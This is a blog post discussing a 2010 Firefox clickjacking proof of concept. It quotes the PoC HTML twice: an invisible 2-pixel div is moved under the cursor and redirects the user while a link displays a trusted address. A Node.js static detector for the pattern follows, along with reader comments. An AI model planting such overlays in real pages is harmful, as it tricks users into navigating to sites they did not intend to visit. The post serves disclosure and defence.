Xanda's Blog !~!

Phishing or Clickjacking?

Feb 26

I was about to shut down my machine and go to sleep, but suddenly my RSS reader popped up new feeds.

Here is one thing that made me smile:

Mozilla firefox 3.6 unpatched phishing vulnerability

From: bugsbanned () hushmail com
Date: Wed, 24 Feb 2010 19:29:33 -0300

…Unpatched bug since Mozilla firefox 3.0…

Mozilla “INsecurity team”, remember: security through obscurity just DOESN’T WORK…
Locking down bugzilla advisories, even the 2-year-old ones, is unnecessary and lame.

<html>
<body>
<!-- The decoy: a 2x2 px white div, absolutely positioned, so it is effectively
     invisible. The moment the pointer is over it, the page navigates away. -->
<div id="mydiv"
onmouseover="document.location='http://Maliciouswebsite';"
style="position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px"></div>
<script>
// Called from the visible link's onclick: move the decoy so it sits right under
// the pointer. 'px' is appended so the assignment also works outside quirks mode
// (the original relied on unitless values being accepted).
function updatebox(evt) {
  mouseX=evt.pageX?evt.pageX:evt.clientX;
  mouseY=evt.pageY?evt.pageY:evt.clientY;
  document.getElementById('mydiv').style.left=(mouseX-1)+'px';
  document.getElementById('mydiv').style.top=(mouseY-1)+'px';
}
</script>
<br>
<!-- The bait: a link whose href (shown in the status bar) is the trusted site;
     clicking it only moves the decoy under the pointer. -->
<a href="http://trustedwebsite" onclick="updatebox(event)"><font
style="font-family:arial;font-size:32px">http://trustedwebsite</font></a><br>
</body>
</html>

For example:

<html>
<body>
<!-- Same as above with concrete URLs: the link advertises google.com,
     the decoy under the pointer sends the victim to wikipedia.org. -->
<div id="mydiv"
onmouseover="document.location='http://www.wikipedia.org';"
style="position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px"></div>
<script>
function updatebox(evt) {
  mouseX=evt.pageX?evt.pageX:evt.clientX;
  mouseY=evt.pageY?evt.pageY:evt.clientY;
  document.getElementById('mydiv').style.left=(mouseX-1)+'px';
  document.getElementById('mydiv').style.top=(mouseY-1)+'px';
}
</script>
<br>
<a href="http://www.google.com" onclick="updatebox(event)"><font
style="font-family:arial;font-size:32px">http://www.google.com</font></a><br>
</body>
</html>

Source: www.exploit-db.com

Phishing huh? To me it’s clickjacking 🙂

Source: http://seclists.org/fulldisclosure/2010/Feb/434

P/S: Oh yeah, NoScript is one of my best friends, and he wants to be your best friend too 😉
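Whatever you call it, the pattern worth catching is the one in the PoC above: a positioned, near-invisible element that is moved under the pointer and navigates away on mouseover. The following is an added example of mine, not code from the Full Disclosure post, this blog or Mozilla. It is a static scan that runs on raw HTML under Node.js with no browser or DOM library, flagging elements that are absolutely or fixed positioned, tiny or invisible, and carry an inline mouse handler that writes to `location`, and it separately notes whether an inline script moves that element's `style.left`/`style.top`, the "follow the cursor" half of the trick. The 4 px threshold, the function names and the sample markup are this example's own assumptions.

```javascript
'use strict';
// Added example, not code from the Full Disclosure post, this blog or Mozilla: a static
// heuristic for the cursor-following overlay trick quoted above. Runs on raw HTML under
// Node.js (no browser, no DOM library). Thresholds, names and sample markup are assumptions.

const TINY_PX = 4; // assumed: a box this small is a decoy, not a real control
const NAV_HANDLERS = ['onmouseover', 'onmouseenter', 'onmousemove'];
// Navigation sinks an inline handler may use: location = ..., location.href = ...,
// location.replace(...) / assign(...), with or without a document./window./top./self. prefix.
const NAV_SINK = /\b(?:document\.|window\.|top\.|self\.)?location(?:\.href|\.replace|\.assign)?\s*(?:=(?!=)|\()/i;
// A start tag; quoted values are consumed whole so a '>' inside them does not end the tag.
// Curly quotes count as quotes because copy-pasted PoCs (like the one above) often carry them.
const TAG_RE = /<([a-zA-Z][\w:-]*)((?:"[^"]*"|'[^']*'|[“”][^“”]*[“”]|[‘’][^‘’]*[‘’]|[^>"'“”‘’])*)>/g;
const ATTR_RE = /([^\s=\/"'“”‘’>]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|[“”]([^“”]*)[“”]|[‘’]([^‘’]*)[‘’]|([^\s"'“”‘’>]+))/g;

// name=value pairs of one start tag, keys lower-cased; bare junk such as a stray ';' is skipped.
function parseAttributes(tagBody) {
  const attrs = {};
  for (const m of tagBody.matchAll(ATTR_RE)) {
    attrs[m[1].toLowerCase()] = [m[2], m[3], m[4], m[5], m[6]].find((v) => v !== undefined) || '';
  }
  return attrs;
}

// "position:absolute;width:2px" -> { position: 'absolute', width: '2px' }
function parseStyle(style) {
  const decl = {};
  for (const part of style.split(';')) {
    const i = part.indexOf(':');
    if (i > 0) decl[part.slice(0, i).trim().toLowerCase()] = part.slice(i + 1).trim().toLowerCase();
  }
  return decl;
}

// Numeric pixel length ('2px' or bare '2'), or null when absent / not a pixel length.
function pxValue(v) {
  const m = v === undefined ? null : /^(-?\d+(?:\.\d+)?)(?:px)?$/.exec(v);
  return m ? parseFloat(m[1]) : null;
}

// Too small to be a real control, or invisible while still able to receive mouse events.
function isTinyOrInvisible(decl) {
  const w = pxValue(decl.width);
  const h = pxValue(decl.height);
  if (w !== null && h !== null && w <= TINY_PX && h <= TINY_PX) return true;
  if (decl.opacity !== undefined && parseFloat(decl.opacity) === 0) return true;
  return decl.visibility === 'hidden';
}

// Second signal: inline scripts that move an element by id via style.left / style.top,
// i.e. the "follow the cursor" half of the trick. Returns the set of ids moved that way.
function findCursorFollowers(html) {
  const ids = new Set();
  const moveRe = /getElementById\(\s*["'“”‘’]([^"'“”‘’]+)["'“”‘’]\s*\)\.style\.(?:left|top)\s*=/g;
  for (const s of html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)) {
    for (const mm of s[1].matchAll(moveRe)) ids.add(mm[1]);
  }
  return ids;
}

// Main check: absolute/fixed positioned + tiny or invisible + a mouse handler that navigates.
function findCursorOverlays(html) {
  const followers = findCursorFollowers(html);
  const markup = html.replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, ''); // tags inside JS are not markup
  const findings = [];
  for (const m of markup.matchAll(TAG_RE)) {
    const attrs = parseAttributes(m[2]);
    const decl = parseStyle(attrs.style || '');
    const positioned = decl.position === 'absolute' || decl.position === 'fixed';
    const handler = NAV_HANDLERS.find((h) => attrs[h] !== undefined && NAV_SINK.test(attrs[h]));
    if (positioned && handler && isTinyOrInvisible(decl)) {
      const id = attrs.id || null;
      findings.push({ tag: m[1].toLowerCase(), id, handler, followsCursor: id !== null && followers.has(id) });
    }
  }
  return findings;
}

// Constructed sample: the PoC from the post, plus a large positioned banner whose
// onmouseover only recolours it, which must NOT be flagged.
const SAMPLE_POC = `<html><body>
<div id="mydiv" onmouseover="document.location='http://www.wikipedia.org';"
 style="position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px"></div>
<script>
function updatebox(evt) {
  mouseX=evt.pageX?evt.pageX:evt.clientX;
  mouseY=evt.pageY?evt.pageY:evt.clientY;
  document.getElementById('mydiv').style.left=mouseX-1;
  document.getElementById('mydiv').style.top=mouseY-1;
}
</script>
<a href="http://www.google.com" onclick="updatebox(event)">http://www.google.com</a>
<div id="banner" style="position:absolute;width:300px;height:60px"
 onmouseover="this.style.background='#eee'">ad</div>
</body></html>`;

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(findCursorOverlays(SAMPLE_POC), null, 2));
}
```

Running the file prints one finding for `mydiv` with `followsCursor: true`; the 300x60 banner is ignored because it is neither tiny nor invisible. The same rules work on the WordPress-mangled copy with curly quotes, which is why the quote classes are in the regexes. It is a triage aid only: it cannot see overlays built at runtime with `createElement`, handlers attached with `addEventListener`, or sizes set from a stylesheet, which is where a render-time defence such as the NoScript the author recommends earns its keep.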

2 Responses to Phishing or Clickjacking?

  1. I think this is just clickjacking..
    why did you suddenly say “or phishing”?

  2. Did I say phishing? I was just mocking that guy…

    “Phishing huh?” <= that is the mocking line
